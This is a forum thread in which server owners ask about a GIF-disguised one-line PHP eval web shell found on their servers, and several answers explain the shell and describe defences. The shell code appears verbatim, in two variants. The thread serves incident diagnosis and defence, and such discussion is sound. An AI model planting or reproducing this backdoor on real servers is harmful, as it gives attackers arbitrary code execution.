I found this file on my server, it contains the following code:
GIF89a
<?php eval ($_POST[plm12345plm]); ?>
There is no other code beside that one above. Is this malicious?
I found this file on my server, it contains the following code:
GIF89a
<?php eval ($_POST[plm12345plm]); ?>
There is no other code beside that one above. Is this malicious?
Yes, this is rogue. This script will execute any PHP code passed as plm12345plm
POST parameter. This means, an attacker can execute arbitrary PHP and -- depending on the server configuration -- further code on your server.
The first GIF89a
line is likely placed to bypass basic file verification during upload of the script as a GIF image.
If the file could actually be executed, consider the server as compromised. If it is not executable directly, it still could be exploited using local file inclusion attacks.
Yes, this is a PHP web shell. Eval should be the red flag.
Basically, if the user can access this file on your server, they may be able to execute OS commands. If you have properly implemented your site, the attacker should not be able to trick PHP into executing the code in what I am assuming is a .GIF file.
However, if I were you I would batten down the hatches and start your incident response procedures. Someone definitely attempted to break in, and without further research, you wont know if they succeeded.
My server was hacked with the same method. My Server ISP saw huge netload and took the server offline and informed me.
File ali.jpg has textual code: GIF89a?lovealihack <?php eval($_POST[alihackxx])?>
This file was waiting at least since begin 2015 (I traced it back in my backups). It is located in the writable site URL/userfiles/Image directory. When it is called from an outside form with variable alihackxx and method POST containing PHP code in the variable the Apache Server will execute it as www-data user and it contaminated ALL the sites with a writable directory Media, FILE and lot of JPG and PHP files to attack on other servers.
It is most likely caused by the (old) FCKeditor I use on all sites, which allows the user to upload a picture that will be inserted in the users site page. There is also a way of pushing data in a writable site/writable directory via the PUT method. It is possible to turn the usage of this method off.
Immediate solution/prevention:
I am shocked to see such a simple vulnerability. I have bad feelings about being hacked.
I changed all (site URL) 777 (writable directories) to 755 only writable for FTP/server user, so Apache (www-data user) cannot write in it anymore.
ToDo's:
My customers still need to upload JPGs, MP3s and PDFs.
They must pass a proper upload gateway that reads the file for malicious <?php
and the eval(
Also no fun to adjust the mail forms with file attachments. It is important that the file attachment should not be in a site URL/writable directory.
I hope I informed you guys about this server hack and hope you can prevent your server being hacked.